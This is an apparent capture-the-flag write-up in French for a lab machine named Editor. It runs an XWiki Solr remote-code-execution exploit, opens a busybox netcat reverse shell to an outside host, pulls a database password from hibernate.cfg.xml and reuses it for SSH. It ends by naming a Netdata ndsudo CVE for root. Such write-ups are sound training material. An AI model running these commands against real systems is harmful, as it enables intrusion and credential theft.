← Retour aux writeups

Editor

User

Dork : "XWiki Debian 15.10.8" "cve”

Résultat :

GitHub - torjan0/xwiki_solrsearch-rce-exploit: Unauth ... 

~ $ python3 xwiki_solr_rce.py --target http://10.10.11.80:8080/ cmd --cmd "whoami"

ça fonctionne je met un revshell busybox

~ $ python3 xwiki_solr_rce.py --target http://10.10.11.80:8080/ cmd --cmd "busybox nc 10.10.15.157 9001 -e /bin/bash"

j’y suis

je transforme en terminal interractif python3 -c 'import pty; pty.spawn("/bin/bash")'

je cat /etc/passwd

ça marche pas ca prends trop longtemps

je fais une commande qui demande moins de taf :

cat /etc/passwd | cut -d: -f1
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
_apt
systemd-network
systemd-resolve
messagebus
systemd-timesync
pollinate
sshd
syslog
uuidd
tcpdump
tss
landscape
fwupd-refresh
usbmux
lxd
dnsmasq
mysql
tomcat
xwiki
netdata
oliver
_laurel

me concentrer sur olivier

bon je galere ; recontextualisons ;

j’ai une db mysql je ne sais ni ou ni comment elle est
j’ai java qui tourne (je sais grace au ps aux)

sur la conf pour voir tout ce qui a un lien avec la db
selon la conf les creds de la db sont dans le fichier de conf Hibernate, jer regarde son nom complet, à savoir hibernate.cfg.xml je le find

xwiki@editor:~$ find / -name "hibernate.cfg.xml" 2>/dev/null
find / -name "hibernate.cfg.xml" 2>/dev/null
/etc/xwiki/hibernate.cfg.xml
/usr/lib/xwiki/WEB-INF/hibernate.cfg.xml
/usr/share/xwiki/templates/mysql/hibernate.cfg.xml

je cat le premier et bingo j’ai un mdp 

xwiki@editor:~$ cat /etc/xwiki/hibernate.cfg.xml | grep password
cat /etc/xwiki/hibernate.cfg.xml | grep password
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>

Connexion SSH a olivier

ça marche pas

MDR bon ca marchais pas parce que le mecc s’appelle oliver pas olivier

flag

Root

dans le resultat linPEAS la piste la plus interesssante semble etre netdata

je dork cve sur netdata et yen a une qui reviens

GitHub - dollarboysushil/CVE-2024-32019-Netdata-ndsudo...